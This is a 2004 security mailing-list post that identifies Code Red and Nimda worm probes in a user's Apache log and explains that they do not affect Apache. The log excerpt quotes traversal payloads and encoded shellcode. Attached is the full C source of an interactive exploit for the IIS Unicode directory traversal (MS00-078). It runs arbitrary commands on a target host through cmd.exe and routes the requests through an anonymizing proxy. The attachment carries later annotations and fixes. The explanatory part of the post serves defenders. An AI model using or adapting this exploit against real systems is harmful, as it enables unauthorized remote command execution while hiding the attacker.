[Dshield] Suspect HTTP-activity

jayjwa jayjwa at atr2.ath.cx
Sat Jan 24 08:53:48 GMT 2004




On Fri, 23 Jan 2004, Martin Agren wrote:

> Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
> haven't publicly announced my web-server in any way -- I just use it for
> development of web-code and invite other developers to check it out.
>
> Most of these logs seems to indicate nothing actually happened
> (404-status), but I'm curious as to what it's all about and if anyone
> might be interested in this information. Any DShield-like service that
> collects apache-logs? ;-)


> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 308
> 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1"
> 404 320
> 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET
> /scripts/nsiislog.dll" 404 -
> 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 307
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 346
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 362
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329

I believe the "default.ida" request is the signature of the Code Red worm: it targets the buffer overflow in the IIS Index Server ISAPI filter (idq.dll, MS01-033), and the long run of X's followed by `%u9090%u6858%ucbd3%u7801...` is its encoded payload. The `nsiislog.dll` probe is, again, IIS-related -- it is the ISAPI logging extension that Windows Media Services installs (the nsiislog.dll flaws are MS03-019 and MS03-022). The burst from 194.47.216.32 (`root.exe?/c+dir` and `cmd.exe?/c+dir` via `/scripts`, `/MSADC`, `/_vti_bin`, `/_mem_bin`, plus the `..%c0%af..`, `..%c1%9c..` and `..%255c..` traversals) is the fixed probe list of the Nimda worm, which chains the Code Red II `root.exe` backdoor with the IIS Unicode (MS00-078) and double-decode (MS01-026) directory traversals; the two 400s on the `..%%35%63..` lines are just Apache rejecting the malformed escape. There are many, many scripts and exploits for this. You were almost certainly not targeted: worms and scanners send these to every address in a range regardless of what is listening, and an Apache server simply logs them as 404s because none of those paths exist. Check the attachment -- look familiar? It uses the same `..%c0%af..` and `..%c1%9c..` strings. I don't feel guilty about posting it in public: it is very old, it is everywhere, and the fix has been available since 2000, so any IIS host still vulnerable to it should have been patched long ago.

I got a wave of these on my Apache server. They seemed to stop when I
moved it off port 80, SSL'ed it, and stuck it up on 443. Apparently no one
looks up there =) To be clear, that only hides the server from worms that
scan port 80 alone; it is not a fix -- these requests were never going to do
anything to Apache, and any scanner that also covers 443 will still find it.


[jayjwa]RLF#37


-------------- next part --------------
/* hack IIS 4.0/5.0 with the useful UNICODE :) and have fun */
/* coded by zipo */
/* to compile: cc -o iisuni iisuni.c */
/* made for all the lame populus :) */
/* Historical exploit for the IIS 4.0/5.0 "Unicode" directory traversal (MS00-078, patched in October 2000).
   Kept so the request strings in the log excerpt above can be recognised; the %c0%af / %c1%9c sequences
   below are the same ones that appear in the Nimda probe lines. */
/* Editor's Note: These guys go to all this trouble to write this, then fuck up the usage info, great! */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* Size in bytes (including the NUL) of the command, request and reply buffers. */
#define BUFF_LEN 6000
/* Request tail: plain HTTP/1.0, no Host or other headers. */
#define HTTP " HTTP/1.0\r\n\r\n"
/* Request head in absolute-URI form ("GET http://<host>...") because the
 * request is addressed to a proxy, not to the target itself. */
#define GET "GET http://"
/* Every request is relayed through this anonymizing web proxy: the tool
 * connects here (on HTTP_PORT), never to the target.  Whether this host still
 * exists is not something the listing can show. */
#define ANON "anon.free.anonymizer.com"
/* The selectable request prefixes (argv[2] = 1..4).  BUG1..BUG3 are the
 * IIS 4/5 "Unicode" directory traversal (MS00-078): "%c0%af" and "%c1%9c" are
 * overlong UTF-8 encodings of '/' and '\' that IIS decoded only after its
 * "..\" path check, so "..%c0%af.." walked out of the web root to cmd.exe.
 * The three differ in the executable virtual directory they start from
 * (msadc, scripts, iisadmpwd) and in the number of ".." steps.  BUG4 is just
 * "/": the user types the whole path at the prompt. */
#define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* TCP port of the connection to the proxy (ANON), not necessarily the target's
 * port: the target URL carries no port, so the proxy picks it. */
#define HTTP_PORT 80
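int bad_params (char *prog_name);

/* Write all of data[0..len) to fd, retrying on short writes.
 * Returns 0 on success, -1 (errno set) when write() fails. */
static int send_all (int fd, const char *data, size_t len) {
   size_t done = 0;
   while (done < len) {
      ssize_t n = write (fd, data + done, len - done);
      if (n < 0)
         return -1;
      done += (size_t) n;
   }
   return 0;
}

/* Read from fd until the peer closes, an error occurs, or cap-1 bytes are
 * stored.  buf is always NUL-terminated.  Returns the number of bytes stored. */
static size_t recv_all (int fd, char *buf, size_t cap) {
   size_t got = 0;
   while (got < cap - 1) {
      ssize_t n = read (fd, buf + got, cap - 1 - got);
      if (n <= 0)
         break;
      got += (size_t) n;
   }
   buf[got] = '\0';
   return got;
}

/* Open a TCP connection to the proxy ANON on HTTP_PORT and return the socket.
 * Resolve, socket() and connect() failures terminate the process with status
 * 1, as the original code did. */
static int connect_proxy (void) {
   struct hostent *he = gethostbyname (ANON);
   /* the address is copied into a sockaddr_in, so insist on an IPv4 record */
   if (he == NULL || he->h_addrtype != AF_INET
       || he->h_length != (int) sizeof (struct in_addr)) {
      fprintf (stderr, "host error: cannot resolve %s\n", ANON);
      exit (1);
   }
   struct sockaddr_in sin = { .sin_family = AF_INET, .sin_port = htons (HTTP_PORT) };
   memcpy (&sin.sin_addr, he->h_addr_list[0], sizeof (sin.sin_addr));

   int sck = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (sck < 0) {
      perror ("socket() error");
      exit (1);
   }
   if (connect (sck, (struct sockaddr *) &sin, sizeof (sin)) < 0) {
      perror ("connect() error");
      close (sck);
      exit (1);
   }
   return sck;
}

/*
 * Interactive driver.  Reads one command per line from stdin, appends it to
 * the traversal prefix selected by argv[2] (BUG1..BUG4) for the host named in
 * argv[1], sends "GET http://<host><prefix><cmd> HTTP/1.0" to the ANON proxy
 * and prints the reply.  Historical tool for a flaw patched in 2000
 * (MS00-078); kept for reference.
 *
 * argv[1]: target host as the proxy should see it (not validated here).
 * argv[2]: 1..4 selects the prefix; anything else prints "Number error".
 * "exit" (or end of input) returns 0; bad arguments or a failed resolve,
 * connect or send return 1.  "clear", "" and "?" are handled locally.
 *
 * Fixes relative to the original listing:
 *  - the request was sent with write(..., sizeof(buffer)): the request plus
 *    ~6 KB of uninitialised stack on every command; now only strlen() bytes.
 *  - sprintf() into buffer[] from an unbounded argv[1] and a command of up to
 *    BUFF_LEN-1 bytes could overrun the stack; now snprintf() with a check.
 *  - the reply buffer was never NUL-terminated and "strlen()-1" underflowed
 *    on an empty reply; now read in a loop, terminated, trailing '\n' only.
 *  - fgets() was unchecked, so EOF left cmd uninitialised; now exits cleanly.
 */
int main (int argc, char *argv[]) {
   const char *bug;
   char cmd[BUFF_LEN], recbuffer[BUFF_LEN], buffer[BUFF_LEN];

   if (argc < 3)
     bad_params (argv[0]);

   /* atoi() kept on purpose: "1x" still selects prefix 1, as before */
   switch (atoi (argv[2])) {
    case 1:
      bug = BUG1_STR;
      break;
    case 2:
      bug = BUG2_STR;
      break;
    case 3:
      bug = BUG3_STR;
      break;
    case 4:
      bug = BUG4_STR;
      break;
    default:
      printf ("Number error\n");
      exit (1);
   }

   for (;;) {
      printf ("bash# ");
      fflush (stdout);
      if (fgets (cmd, sizeof (cmd), stdin) == NULL) {
         /* end of input: leave quietly instead of touching an unset buffer */
         exit (0);
      }
      /* strip the newline only if present; a line that filled the buffer
       * exactly used to lose its last real character instead */
      cmd[strcspn (cmd, "\n")] = '\0';

      if (!strcmp (cmd, "exit")) {
         /* you type "exit" cya :) */
         exit (0);
      }
      if (!strcmp (cmd, "clear")) {
         /* was system("clear"), a shell spawn via PATH for a one-liner; the
          * banners below already assume an ANSI terminal, so use the escape */
         fputs ("\033[H\033[2J", stdout);
         fflush (stdout);
         continue;
      }
      if (!strcmp (cmd, "")) {
         continue;
      }
      if (!strcmp (cmd, "?")) {
         printf ("Just you need to type in the prompt the M$DOS command\n");
         printf ("to exit type \"exit\" :)\n");
         continue;
      }

      /* Only spaces are encoded (as '+'); every other reserved character in
       * the command goes out raw, exactly as in the original. */
      for (char *p = cmd; *p != '\0'; p++) {
         if (*p == ' ')
            *p = '+';
      }

      /* build the request; reject it rather than truncate when it does not fit */
      int need = snprintf (buffer, sizeof (buffer), "%s%s%s%s%s",
                           GET, argv[1], bug, cmd, HTTP);
      if (need < 0 || (size_t) need >= sizeof (buffer)) {
         fprintf (stderr, "request too long (%d bytes, max %zu)\n",
                  need, sizeof (buffer) - 1);
         continue;
      }

      int sck = connect_proxy ();

      if (send_all (sck, buffer, (size_t) need) < 0) {
         perror ("write() error");
         close (sck);
         exit (1);
      }

      /* read until the peer closes (HTTP/1.0, no keep-alive requested) */
      size_t got = recv_all (sck, recbuffer, sizeof (recbuffer));
      close (sck);

      /* the original dropped the last byte unconditionally; drop a trailing
       * newline only, and nothing on an empty reply */
      if (got > 0 && recbuffer[got - 1] == '\n')
         recbuffer[got - 1] = '\0';

      printf("\033[0;7m-------------------------------------Received-----------------------------------\n");
      printf("%s\n---------------------------------------Done-------------------------------------\n\033[7;0m", recbuffer);
   }
}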
/* you miss a parameter :'-( */
/* Print the usage text for prog_name to stdout and terminate with status 1.
 * Declared int to match the existing call site, but it never returns. */
int bad_params (char *prog_name) {
   static const char rule[] =
      "-------------------------------------------------------\n";
   printf ("usage:\n\t%s <hostname> <number>\n", prog_name);
   fputs (rule, stdout);
   /* one line listing the four selectable prefixes, tab separated */
   fputs ("<1> msadc\t<2> scripts\t<3> iisadmpwd\t<4> /\n", stdout);
   fputs (rule, stdout);
   exit (1);
}
/* EOF */

